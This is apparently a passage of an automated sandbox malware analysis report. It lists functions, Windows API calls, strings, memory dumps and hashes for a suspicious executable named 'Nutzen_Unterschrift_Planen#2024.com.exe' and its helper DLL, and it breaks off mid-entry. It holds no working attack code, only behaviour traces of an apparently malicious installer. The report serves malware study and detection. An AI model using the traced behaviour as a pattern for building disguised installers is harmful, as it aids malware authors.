                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.316844690190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844786707.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316845453291.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: cb0b7ebd38eb4799b8f4196fcc58e5a20f32a56ef1c2a101366cf6dcdfe2cd36
                                                            • Instruction ID: 05de0a4d5a0d3ad16659c86bea74b86f68b6b4ad9b47f793b7e3caf381fa8301
                                                            • Opcode Fuzzy Hash: cb0b7ebd38eb4799b8f4196fcc58e5a20f32a56ef1c2a101366cf6dcdfe2cd36
                                                            • Instruction Fuzzy Hash: 10C09BB17843017BDE109B509D49F0777585BE0741F15857D7350F50E0C674E450D61D
                                                            Function 00403308 Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetFilePointer.KERNELBASE(?,00000000,00000000,00403088,?,?,00000006,00000008,0000000A), ref: 00403316
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.316844690190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844786707.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316845453291.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: FilePointer
                                                            • String ID:
                                                            • API String ID: 973152223-0
                                                            • Opcode ID: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                            • Instruction ID: c7266a3154837caca095f11e7777f6dda2278cbf6cff4ee7664d3894fc3aa091
                                                            • Opcode Fuzzy Hash: d5a77a7b91dde00220c09aa0a832f43c90240fc94845358d4caa889c1b96a79f
                                                            • Instruction Fuzzy Hash: ECB01271240300BFDA214F00DF09F057B21AB90700F10C034B348380F086711035EB0D
                                                            Function 00404229 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SendMessageW.USER32(00000028,?,00000001,00404054), ref: 00404237
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.316844690190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844786707.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316845453291.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
                                                            • Instruction ID: 5dee82f2d739acac93035fb571c052082ac1606baee7bb158d490297d0aa81d3
                                                            • Opcode Fuzzy Hash: f360a53124e97c409135d1b53ccadec94ff58fec8389da7a5f3de8c8d06ef766
                                                            • Instruction Fuzzy Hash: 99B09236190A00AADE614B40DE49F457A62A7A8701F00C029B240640B0CAB200A0DB09
                                                            Function 00404216 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • KiUserCallbackDispatcher.NTDLL(?,00403FED), ref: 00404220
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.316844690190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844786707.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316845453291.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: CallbackDispatcherUser
                                                            • String ID:
                                                            • API String ID: 2492992576-0
                                                            • Opcode ID: efc6552eadcfffb9f020cd3683497eb6feb0237cfd1954b00ec8dcd11a4bd103
                                                            • Instruction ID: 2198674f4dd135e02f2a8ae7056ebba5a8e761495b22eeaea90ee2a366c7106d
                                                            • Opcode Fuzzy Hash: efc6552eadcfffb9f020cd3683497eb6feb0237cfd1954b00ec8dcd11a4bd103
                                                            • Instruction Fuzzy Hash: 0AA002754455409FDF015B50EF048057A61B7E5741B61C469A25551074C7354461EB19

                                                            Non-executed Functions

                                                            Function 10001B18 Relevance: 20.0, APIs: 13, Instructions: 544stringmemoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                            • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 10001C24
                                                            • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                            • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                            • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                            • GlobalFree.KERNEL32(?), ref: 10001D83
                                                            • GlobalFree.KERNEL32(?), ref: 10001D88
                                                            • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                            • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                            • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316860454531.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.316860422171.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.316860484299.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.316860509538.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Global$Free$lstrcpy$Alloc
                                                            • String ID:
                                                            • API String ID: 4227406936-0
                                                            • Opcode ID: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                            • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                            • Opcode Fuzzy Hash: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                            • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50
                                                            Function 00405EAB Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 130memorystringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,00406046,00000000,00000000), ref: 00405EE6
                                                            • GetShortPathNameW.KERNEL32(?,007A55C0,00000400), ref: 00405EEF
                                                              • Part of subcall function 00405CB6: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000), ref: 00405CC6
                                                              • Part of subcall function 00405CB6: lstrlenA.KERNEL32(00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000), ref: 00405CF8
                                                            • GetShortPathNameW.KERNEL32(?,007A5DC0,00000400), ref: 00405F0C
                                                            • wsprintfA.USER32 ref: 00405F2A
                                                            • GetFileSize.KERNEL32(00000000,00000000,007A5DC0,C0000000,00000004,007A5DC0,?), ref: 00405F65
                                                            • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00405F74
                                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405FAC
                                                            • SetFilePointer.KERNEL32(0040A560,00000000,00000000,00000000,00000000,007A51C0,00000000,-0000000A,0040A560,00000000,[Rename],00000000,00000000,00000000), ref: 00406002
                                                            • GlobalFree.KERNEL32(00000000), ref: 00406013
                                                            • CloseHandle.KERNEL32(00000000), ref: 0040601A
                                                              • Part of subcall function 00405D51: GetFileAttributesW.KERNELBASE(?,00402F01,C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405D55
                                                              • Part of subcall function 00405D51: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405D77
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.316844690190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844786707.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316845453291.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                                            • String ID: %ls=%ls$[Rename]
                                                            • API String ID: 2171350718-461813615
                                                            • Opcode ID: 9234885be5e57950de04a4ffe204c7f94bcd269eedac1ba9c5005a2d30df1b06
                                                            • Instruction ID: 89c32d2153287748ec41ed641a28e9b16702ce233dbd70bd77460b6709aa78c6
                                                            • Opcode Fuzzy Hash: 9234885be5e57950de04a4ffe204c7f94bcd269eedac1ba9c5005a2d30df1b06
                                                            • Instruction Fuzzy Hash: F8312871601B05BBD220AB619D48F6B3A9CEF85744F14003EFA42F62D2DA7CD8118ABD
                                                            Function 004064F3 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CharNextW.USER32(?,*?|<>/":,00000000,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe",0040332B,C:\Users\user\AppData\Local\Temp\,75D53420,0040359C,?,00000006,00000008,0000000A), ref: 00406556
                                                            • CharNextW.USER32(?,?,?,00000000,?,00000006,00000008,0000000A), ref: 00406565
                                                            • CharNextW.USER32(?,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe",0040332B,C:\Users\user\AppData\Local\Temp\,75D53420,0040359C,?,00000006,00000008,0000000A), ref: 0040656A
                                                            • CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe",0040332B,C:\Users\user\AppData\Local\Temp\,75D53420,0040359C,?,00000006,00000008,0000000A), ref: 0040657D
                                                            Strings
                                                            • *?|<>/":, xrefs: 00406545
                                                            • "C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe", xrefs: 004064F3
                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 004064F4, 004064F9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.316844690190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844786707.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316845453291.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Char$Next$Prev
                                                            • String ID: "C:\Users\user\Desktop\Nutzen_Unterschrift_Planen#2024.com.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                            • API String ID: 589700163-1762738896
                                                            • Opcode ID: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                            • Instruction ID: b8c3cbf5b75eb2b2499c9cde9ef872d51aef5c2750dc7b0313243111e00abff4
                                                            • Opcode Fuzzy Hash: dac06de1e1615827748cce9690c43cbd9586789469f0d882438918906e4257c7
                                                            • Instruction Fuzzy Hash: 9B11C85580021275DB303B14BC40ABBA6F8EF59754F52403FE985732C8E77C5C9286BD
                                                            Function 0040425B Relevance: 12.1, APIs: 8, Instructions: 61COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindowLongW.USER32(?,000000EB), ref: 00404278
                                                            • GetSysColor.USER32(00000000), ref: 00404294
                                                            • SetTextColor.GDI32(?,00000000), ref: 004042A0
                                                            • SetBkMode.GDI32(?,?), ref: 004042AC
                                                            • GetSysColor.USER32(?), ref: 004042BF
                                                            • SetBkColor.GDI32(?,?), ref: 004042CF
                                                            • DeleteObject.GDI32(?), ref: 004042E9
                                                            • CreateBrushIndirect.GDI32(?), ref: 004042F3
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.316844690190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844786707.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316845453291.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                            • String ID:
                                                            • API String ID: 2320649405-0
                                                            • Opcode ID: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                            • Instruction ID: 89996262c0d64ac0fda19422125f93b67266a0f1ca122a9c1e6306c3a20023a3
                                                            • Opcode Fuzzy Hash: d93bb5df8f2b76ccefaad0a5d1bb7d3eec77da1dbbaa67d130298efb7d8eee66
                                                            • Instruction Fuzzy Hash: 34219271500704ABCB209F68DE08B4BBBF8AF41714B048A6DFD92A22A0C734D904CB54
                                                            Function 00402DD7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402DF5
                                                            • MulDiv.KERNEL32(000C6DAF,00000064,000C6DB3), ref: 00402E20
                                                            • wsprintfW.USER32 ref: 00402E30
                                                            • SetWindowTextW.USER32(?,?), ref: 00402E40
                                                            • SetDlgItemTextW.USER32(?,00000406,?), ref: 00402E52
                                                            Strings
                                                            • verifying installer: %d%%, xrefs: 00402E2A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316844742576.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.316844690190.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844786707.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316844831465.00000000007DF000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.316845453291.00000000007E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Text$ItemTimerWindowwsprintf
                                                            • String ID: verifying installer: %d%%
                                                            • API String ID: 1451636040-82062127
                                                            • Opcode ID: dbbbfae8d01556434cd8b9f8079c14b742463200277d1f2e5f02c0c8f6c1ad5d
                                                            • Instruction ID: c563a075df83d92fb310a5016e42997ab7e5782e6b78b1479044c0af3efb3f55
                                                            • Opcode Fuzzy Hash: dbbbfae8d01556434cd8b9f8079c14b742463200277d1f2e5f02c0c8f6c1ad5d
                                                            • Instruction Fuzzy Hash: DE01677064020CBFDF149F50DD49FAA3B68AB00304F108039FA06F51D0DBB98965CF59
                                                            Function 100024A4 Relevance: 9.1, APIs: 6, Instructions: 98COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 1000121B: GlobalAlloc.KERNEL32(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                            • GlobalFree.KERNEL32(?), ref: 1000256D
                                                            • GlobalFree.KERNEL32(00000000), ref: 100025A8
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316860454531.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.316860422171.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.316860484299.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.316860509538.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
                                                            • API ID: Global$Free$Alloc
                                                            • String ID:
                                                            • API String ID: 1780285237-0
                                                            • Opcode ID: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                            • Instruction ID: 149f0ffe7112dafd64944f245e56057b96fa329c468151baa91e3d773918aa42
                                                            • Opcode Fuzzy Hash: e72053471c67904cbc9fe51406c75cdd0d1e7ae72e07fb5691a107031e3f1593
                                                            • Instruction Fuzzy Hash: 1031AF71504651EFF721CF14CCA8E2B7BB8FB853D2F114119F940961A8C7719851DB69
                                                            Function 100022D0 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GlobalFree.KERNEL32(00000000), ref: 10002411
                                                              • Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C
                                                            • GlobalAlloc.KERNEL32(00000040), ref: 10002397
                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.316860454531.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                            • Associated: 00000000.00000002.316860422171.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.316860484299.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            • Associated: 00000000.00000002.316860509538.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_10000000_Nutzen_Unterschrift_Planen#2024.jbxd
                                                            Similarity
